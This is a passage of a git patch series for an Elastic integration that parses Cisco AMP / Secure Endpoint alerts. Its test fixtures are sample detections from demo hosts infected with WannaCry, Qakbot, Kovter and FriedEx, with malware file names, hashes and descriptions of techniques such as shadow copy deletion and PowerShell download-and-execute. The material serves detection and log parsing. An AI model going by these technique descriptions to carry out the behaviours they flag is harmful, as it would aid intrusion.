Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419179209167470601\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -3216,7 +3216,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "user": [
@@ -3248,7 +3248,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:32:23.854062787Z",
+                "ingested": "2021-09-13T18:07:55.452613080Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179209167471000,\"timestamp\":1610623595,\"timestamp_nanoseconds\":894000000,\"date\":\"2021-01-14T11:26:35+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419179204872503300\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\WINDOWS\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"},\"parent\":{\"process_id\":3020,\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"}}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -3318,7 +3318,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "user": [
@@ -3346,7 +3346,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:32:23.854064627Z",
+                "ingested": "2021-09-13T18:07:55.452614986Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6583840597369422000,\"timestamp\":1610621973,\"timestamp_nanoseconds\":231000000,\"date\":\"2021-01-14T10:59:33+00:00\",\"event_type\":\"Malicious Activity Detection\",\"event_type_id\":1090519105,\"detection\":\"W32.MAP.Ransomware.rewrite\",\"detection_id\":\"6583840593074454529\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_MAP_FriedEx\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"04:e6:4d:d5:7a:b5\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mscorsvw.exe\",\"file_path\":\"C:\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\v2.0.50727\\\\mscorsvw.exe\",\"identity\":{\"sha256\":\"90b63fbdde1b1aa7295e6cbe9ab7726792f8829eb53f2327f8a9cf109054f2a0\",\"sha1\":\"c78f4c22dd195a1791472a2c271a0c85b53900d9\",\"md5\":\"75a758a0c5cea48c9922d64a113d0f9d\"},\"parent\":{\"process_id\":480,\"disposition\":\"Clean\",\"file_name\":\"services.exe\",\"identity\":{\"sha256\":\"a86d6a6d1f5a0efcd649792a06f3ae9b37158d48493d2eca7f52dcc1cb9b6536\",\"sha1\":\"ff658a36899e43fec3966d608b4aa4472de7a378\",\"md5\":\"71c85477df9347fe8e7bc55768473fca\"}}}}}",
                 "kind": "alert",
                 "action": "Malicious Activity Detection",
@@ -3410,7 +3410,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -3430,7 +3430,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:32:23.854066521Z",
+                "ingested": "2021-09-13T18:07:55.452616892Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6701398782847286000,\"timestamp\":1610621970,\"timestamp_nanoseconds\":182000000,\"date\":\"2021-01-14T10:59:30+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"start_timestamp\":1610621970,\"start_date\":\"2021-01-14T10:59:30+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_MAP_FriedEx\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"04:e6:4d:d5:7a:b5\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"Shadow copies are snapshots of part of the filesystem, used for backups and restore points. Ransomware may delete these to prevent the user from restoring files that it has encrypted or destroyed. Aside from ransomware, shadow copy deletion may also be used by other types of malware to remove forensic evidence of malicious activity.\",\"short_description\":\"W32.PossibleRansomwareShadowCopyDeletion.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"vssadmin.exe\",\"file_path\":\"file:///C%3A/Windows/SysWOW64/vssadmin.exe\",\"identity\":{\"sha256\":\"e09bf4d27555ec7567a598ba89ccc33667252cef1fb0b604315ea7562d18ad10\"},\"parent\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"90b63fbdde1b1aa7295e6cbe9ab7726792f8829eb53f2327f8a9cf109054f2a0\"}}}}}",
                 "kind": "alert",
                 "start": "2021-01-14T10:59:30.000Z",
@@ -3496,7 +3496,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -3516,7 +3516,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:32:23.854068405Z",
+                "ingested": "2021-09-13T18:07:55.452618792Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":7007136036637603000,\"timestamp\":1610621707,\"timestamp_nanoseconds\":260000000,\"date\":\"2021-01-14T10:55:07+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"start_timestamp\":1610621707,\"start_date\":\"2021-01-14T10:55:07+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_MAP_FriedEx\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"04:e6:4d:d5:7a:b5\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a shell was launched with an encoded command or to use Base64 to decode or encode an existing file or command. Malware authors may use this technique to bypass antivirus tools.\",\"short_description\":\"W32.PowershellEncodedBuffer.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"cmd.exe\",\"file_path\":\"file:///C%3A/Windows/system32/cmd.exe\",\"identity\":{\"sha256\":\"db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"a86d6a6d1f5a0efcd649792a06f3ae9b37158d48493d2eca7f52dcc1cb9b6536\"}}}}}",
                 "kind": "alert",
                 "start": "2021-01-14T10:55:07.000Z",
@@ -3582,7 +3582,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -3602,7 +3602,7 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-12T17:32:23.854070258Z",
+                "ingested": "2021-09-13T18:07:55.452620699Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1476905066250000100,\"timestamp\":1610621237,\"timestamp_nanoseconds\":250000000,\"date\":\"2021-01-14T10:47:17+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"start_timestamp\":1610621237,\"start_date\":\"2021-01-14T10:47:17+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Command_Line_Arguments_Kovter\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"b6:9c:d0:89:b8:66\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a script attempted to download a file or script to the local system and then execute it. Malware authors may use this to download items, rename them, execute and delete them with a single command.\",\"short_description\":\"W32.PowershellDownloadedExecutable.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"powershell.exe\",\"file_path\":\"/C:/Windows/SysWoW64/WindowsPowerShell/v1.0/powershell.exe\",\"identity\":{\"sha256\":\"8133502266008b77de7921451e1210b0ef3f0ed2db7d8d3ee0c3350d856fa6fa\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"9d52813a48adcad9eb9df2768aaca43924d503cda2de26b27133d6e3654077ff\"}}}}}",
                 "kind": "alert",
                 "start": "2021-01-14T10:47:17.000Z",
@@ -3668,7 +3668,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -3688,7 +3688,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:32:23.854072129Z",
+                "ingested": "2021-09-13T18:07:55.452622602Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1476905066228000300,\"timestamp\":1610621237,\"timestamp_nanoseconds\":228000000,\"date\":\"2021-01-14T10:47:17+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"start_timestamp\":1610621237,\"start_date\":\"2021-01-14T10:47:17+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Command_Line_Arguments_Kovter\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"b6:9c:d0:89:b8:66\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"Microsoft Word launched PowerShell. This is indicative of multiple dropper variants that make use of Visual Basic Application macros to perform nefarious activities, such as downloading and executing malicious executables.\",\"short_description\":\"W32.WinWord.Powershell\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"powershell.exe\",\"file_path\":\"/C:/Windows/SysWoW64/WindowsPowerShell/v1.0/powershell.exe\",\"identity\":{\"sha256\":\"8133502266008b77de7921451e1210b0ef3f0ed2db7d8d3ee0c3350d856fa6fa\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"9d52813a48adcad9eb9df2768aaca43924d503cda2de26b27133d6e3654077ff\"}}}}}",
                 "kind": "alert",
                 "start": "2021-01-14T10:47:17.000Z",
@@ -3747,7 +3747,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -3767,7 +3767,7 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-12T17:32:23.854074002Z",
+                "ingested": "2021-09-13T18:07:55.452624523Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411425813945647000,\"timestamp\":1610620426,\"timestamp_nanoseconds\":758000000,\"date\":\"2021-01-14T10:33:46+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6411425813945647106\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837\"}}}}",
                 "kind": "alert",
                 "action": "Retrospective Quarantine Attempt Failed",
@@ -3822,7 +3822,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -3842,7 +3842,7 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-12T17:32:23.854075908Z",
+                "ingested": "2021-09-13T18:07:55.452626393Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411425813945647000,\"timestamp\":1610620426,\"timestamp_nanoseconds\":758000000,\"date\":\"2021-01-14T10:33:46+00:00\",\"event_type\":\"Retrospective Quarantine\",\"event_type_id\":553648155,\"detection_id\":\"6411425813945647105\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837\"}}}}",
                 "kind": "alert",
                 "action": "Retrospective Quarantine",
@@ -3895,7 +3895,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -3919,7 +3919,7 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-12T17:32:23.854077773Z",
+                "ingested": "2021-09-13T18:07:55.452628302Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411425813945647000,\"timestamp\":1610620426,\"timestamp_nanoseconds\":742000000,\"date\":\"2021-01-14T10:33:46+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.12081E6CA3-95.SBX.TG\",\"detection_id\":\"6411425813945647106\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"AySxs.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\Documents\\\\AySxs.exe\",\"identity\":{\"sha256\":\"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837\"}}}}",
                 "kind": "alert",
                 "action": "Retrospective Detection",
diff --git a/packages/cisco_amp/data_stream/log/elasticsearch/ingest_pipeline/default.yml b/packages/cisco_amp/data_stream/log/elasticsearch/ingest_pipeline/default.yml
index 8d326db7306..0deeae80697 100644
--- a/packages/cisco_amp/data_stream/log/elasticsearch/ingest_pipeline/default.yml
+++ b/packages/cisco_amp/data_stream/log/elasticsearch/ingest_pipeline/default.yml
@@ -16,11 +16,6 @@ processors:
     field: json.data
     target_field: cisco.amp
     ignore_missing: true
-- remove:
-    field:
-    - "@timestamp"
-    ignore_missing: true
-    if: ctx?.cisco?.amp?.timestamp != null
 - date:
     field: cisco.amp.timestamp
     formats:
@@ -35,7 +30,7 @@ processors:
     value: '{{_ingest.timestamp}}'
 - set:
     field: ecs.version
-    value: '1.11.0'
+    value: '1.12.0'
 - set:
     field: event.kind
     value: alert
diff --git a/packages/cisco_amp/docs/README.md b/packages/cisco_amp/docs/README.md
index 4a510396534..334ebbae376 100644
--- a/packages/cisco_amp/docs/README.md
+++ b/packages/cisco_amp/docs/README.md
@@ -181,7 +181,7 @@ An example event for `log` looks as following:
 | destination.ip | IP address of the destination (IPv4 or IPv6). | ip |
 | destination.port | Port of the destination. | long |
 | ecs.version | ECS version this event conforms to. `ecs.version` is a required field and must exist in all events. When querying across multiple indices -- which may conform to slightly different ECS versions -- this field lets integrations adjust to the schema version of the events. | keyword |
-| error.message | Error message. | text |
+| error.message | Error message. | match_only_text |
 | event.action | The action captured by the event. This describes the information in the event. It is more specific than `event.category`. Examples are `group-add`, `process-started`, `file-created`. The value is normally defined by the implementer. | keyword |
 | event.category | This is one of four ECS Categorization Fields, and indicates the second level in the ECS category hierarchy. `event.category` represents the "big buckets" of ECS categories. For example, filtering on `event.category:process` yields all events relating to process activity. This field is closely related to `event.type`, which is used as a subcategory. This field is an array. This will allow proper categorization of some events that fall in multiple categories. | keyword |
 | event.code | Identification code for this event, if one exists. Some event sources use event codes to identify messages unambiguously, regardless of message language or wording adjustments over time. An example of this is the Windows Event ID. | keyword |

From 3069aa2e3fa6a999387e11e4ee48674cb0315eec Mon Sep 17 00:00:00 2001
From: Alex Resnick <adr8292@gmail.com>
Date: Wed, 15 Sep 2021 02:27:23 +0000
Subject: [PATCH 4/9] rename to Cisco Secure Endpoint

---
 packages/cisco_amp/_dev/build/docs/README.md  |  16 --
 packages/cisco_amp/manifest.yml               |  28 ---
 .../_dev/build/build.yml                      |   0
 .../_dev/build/docs/README.md                 |  16 ++
 .../_dev/deploy/docker/docker-compose.yml     |   2 +-
 .../_dev/deploy/docker/files/config.yml       |   0
 .../changelog.yml                             |   2 +-
 .../_dev/test/pipeline/test-cisco-amp1.log    |   0
 .../test-cisco-amp1.log-expected.json         |   0
 .../_dev/test/pipeline/test-cisco-amp2.log    |   0
 .../test-cisco-amp2.log-expected.json         |   0
 .../_dev/test/pipeline/test-cisco-amp3.log    |   0
 .../test-cisco-amp3.log-expected.json         |   0
 .../_dev/test/pipeline/test-cisco-amp4.log    |   0
 .../test-cisco-amp4.log-expected.json         |   0
 .../_dev/test/pipeline/test-cisco-amp5.log    |   0
 .../test-cisco-amp5.log-expected.json         |   0
 .../_dev/test/pipeline/test-cisco-amp6.log    |   0
 .../test-cisco-amp6.log-expected.json         |   0
 .../_dev/test/pipeline/test-cisco-amp7.log    |   0
 .../test-cisco-amp7.log-expected.json         |   0
 .../_dev/test/pipeline/test-common-config.yml |   0
 .../_dev/test/system/test-default-config.yml  |   2 +-
 .../log/agent/stream/httpjson.yml.hbs         |   0
 .../elasticsearch/ingest_pipeline/default.yml | 166 +++++++++---------
 .../data_stream/log/fields/agent.yml          |   0
 .../data_stream/log/fields/base-fields.yml    |   4 +-
 .../data_stream/log/fields/ecs.yml            |   0
 .../data_stream/log/fields/fields.yml         |   4 +-
 .../data_stream/log/manifest.yml              |  12 +-
 .../data_stream/log/sample_event.json         |   0
 .../docs/README.md                            | 124 ++++++-------
 .../img/cisco.svg                             |   0
 packages/cisco_secure_endpoint/manifest.yml   |  28 +++
 34 files changed, 202 insertions(+), 202 deletions(-)
 delete mode 100644 packages/cisco_amp/_dev/build/docs/README.md
 delete mode 100644 packages/cisco_amp/manifest.yml
 rename packages/{cisco_amp => cisco_secure_endpoint}/_dev/build/build.yml (100%)
 create mode 100644 packages/cisco_secure_endpoint/_dev/build/docs/README.md
 rename packages/{cisco_amp => cisco_secure_endpoint}/_dev/deploy/docker/docker-compose.yml (91%)
 rename packages/{cisco_amp => cisco_secure_endpoint}/_dev/deploy/docker/files/config.yml (100%)
 rename packages/{cisco_amp => cisco_secure_endpoint}/changelog.yml (90%)
 rename packages/{cisco_amp => cisco_secure_endpoint}/data_stream/log/_dev/test/pipeline/test-cisco-amp1.log (100%)
 rename packages/{cisco_amp => cisco_secure_endpoint}/data_stream/log/_dev/test/pipeline/test-cisco-amp1.log-expected.json (100%)
 rename packages/{cisco_amp => cisco_secure_endpoint}/data_stream/log/_dev/test/pipeline/test-cisco-amp2.log (100%)
 rename packages/{cisco_amp => cisco_secure_endpoint}/data_stream/log/_dev/test/pipeline/test-cisco-amp2.log-expected.json (100%)
 rename packages/{cisco_amp => cisco_secure_endpoint}/data_stream/log/_dev/test/pipeline/test-cisco-amp3.log (100%)
 rename packages/{cisco_amp => cisco_secure_endpoint}/data_stream/log/_dev/test/pipeline/test-cisco-amp3.log-expected.json (100%)
 rename packages/{cisco_amp => cisco_secure_endpoint}/data_stream/log/_dev/test/pipeline/test-cisco-amp4.log (100%)
 rename packages/{cisco_amp => cisco_secure_endpoint}/data_stream/log/_dev/test/pipeline/test-cisco-amp4.log-expected.json (100%)
 rename packages/{cisco_amp => cisco_secure_endpoint}/data_stream/log/_dev/test/pipeline/test-cisco-amp5.log (100%)
 rename packages/{cisco_amp => cisco_secure_endpoint}/data_stream/log/_dev/test/pipeline/test-cisco-amp5.log-expected.json (100%)
 rename packages/{cisco_amp => cisco_secure_endpoint}/data_stream/log/_dev/test/pipeline/test-cisco-amp6.log (100%)
 rename packages/{cisco_amp => cisco_secure_endpoint}/data_stream/log/_dev/test/pipeline/test-cisco-amp6.log-expected.json (100%)
 rename packages/{cisco_amp => cisco_secure_endpoint}/data_stream/log/_dev/test/pipeline/test-cisco-amp7.log (100%)
 rename packages/{cisco_amp => cisco_secure_endpoint}/data_stream/log/_dev/test/pipeline/test-cisco-amp7.log-expected.json (100%)
 rename packages/{cisco_amp => cisco_secure_endpoint}/data_stream/log/_dev/test/pipeline/test-common-config.yml (100%)
 rename packages/{cisco_amp => cisco_secure_endpoint}/data_stream/log/_dev/test/system/test-default-config.yml (87%)
 rename packages/{cisco_amp => cisco_secure_endpoint}/data_stream/log/agent/stream/httpjson.yml.hbs (100%)
 rename packages/{cisco_amp => cisco_secure_endpoint}/data_stream/log/elasticsearch/ingest_pipeline/default.yml (62%)
 rename packages/{cisco_amp => cisco_secure_endpoint}/data_stream/log/fields/agent.yml (100%)
 rename packages/{cisco_amp => cisco_secure_endpoint}/data_stream/log/fields/base-fields.yml (94%)
 rename packages/{cisco_amp => cisco_secure_endpoint}/data_stream/log/fields/ecs.yml (100%)
 rename packages/{cisco_amp => cisco_secure_endpoint}/data_stream/log/fields/fields.yml (99%)
 rename packages/{cisco_amp => cisco_secure_endpoint}/data_stream/log/manifest.yml (90%)
 rename packages/{cisco_amp => cisco_secure_endpoint}/data_stream/log/sample_event.json (100%)
 rename packages/{cisco_amp => cisco_secure_endpoint}/docs/README.md (68%)
 rename packages/{cisco_amp => cisco_secure_endpoint}/img/cisco.svg (100%)
 create mode 100644 packages/cisco_secure_endpoint/manifest.yml

diff --git a/packages/cisco_amp/_dev/build/docs/README.md b/packages/cisco_amp/_dev/build/docs/README.md
deleted file mode 100644
index 2d934ee3a94..00000000000
--- a/packages/cisco_amp/_dev/build/docs/README.md
+++ /dev/null
@@ -1,16 +0,0 @@
-# Cisco AMP Integration
-
-This integration is for Cisco AMP logs. It includes the following
-datasets for receiving logs over syslog or read from a file:
-
-- `log` dataset: supports Cisco AMP logs.
-
-## Logs
-
-### AMP
-
-The `log` dataset collects Cisco AMP logs.
-
-{{event "log"}}
-
-{{fields "log"}}
diff --git a/packages/cisco_amp/manifest.yml b/packages/cisco_amp/manifest.yml
deleted file mode 100644
index e601af7c7f9..00000000000
--- a/packages/cisco_amp/manifest.yml
+++ /dev/null
@@ -1,28 +0,0 @@
-format_version: 1.0.0
-name: cisco_amp
-title: Cisco AMP
-version: 0.0.1
-license: basic
